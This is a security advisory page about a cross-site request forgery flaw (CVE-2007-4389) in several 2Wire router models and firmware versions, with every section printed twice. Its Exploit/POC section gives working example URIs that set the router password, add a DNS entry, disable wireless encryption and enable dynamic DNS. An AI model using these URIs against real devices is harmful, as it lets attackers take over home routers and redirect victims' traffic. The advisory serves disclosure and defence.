2Wire Routers Cross-Site Request Forgery Vulnerability
BID:27246
Info
2Wire Routers Cross-Site Request Forgery Vulnerability
| Bugtraq ID: | 27246 |
| Class: | Design Error |
| CVE: |
CVE-2007-4389 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 15 2007 12:00AM |
| Updated: | Jan 31 2008 07:57PM |
| Credit: | [email protected] and Eduardo Espina García are credited with the discovery of this vulnerability. |
| Vulnerable: |
2Wire 2071 Gateway 5.29.51 2Wire 2071 Gateway 3.17.5 2Wire 2071 Gateway 3.7.1 2Wire 1800HW 5.29.51 2Wire 1800HW 3.17.5 2Wire 1800HW 3.7.1 2Wire 1701HG 5.29.51 2Wire 1701HG 3.17.5 2Wire 1701HG 3.7.1 |
| Not Vulnerable: | |
Discussion
2Wire Routers Cross-Site Request Forgery Vulnerability
Multiple 2Wire routers are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to execute arbitrary actions on an affected device.
Multiple 2Wire routers are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to execute arbitrary actions on an affected device.
Exploit / POC
2Wire Routers Cross-Site Request Forgery Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
Reports indicate this issue is being actively exploited in the wild.
The following example URIs are available:
Set a password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS
Add names to the DNS:
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1
Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0
Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
Reports indicate this issue is being actively exploited in the wild.
The following example URIs are available:
Set a password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS
Add names to the DNS:
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1
Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0
Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE
Solution / Fix
2Wire Routers Cross-Site Request Forgery Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
2Wire Routers Cross-Site Request Forgery Vulnerability
References:
References:
- 2wire Homepage (2wire)
- Cross Site Request Forgery in 2wire routers (hkm hakim ws)
- Targeted Attack in Mexico: DNS Poisoning via Modems (Trend Micro)
- Vulnerabilidad de autenticación en ruteadores 2Wire (DSC/UNAM-CERT DGSCA)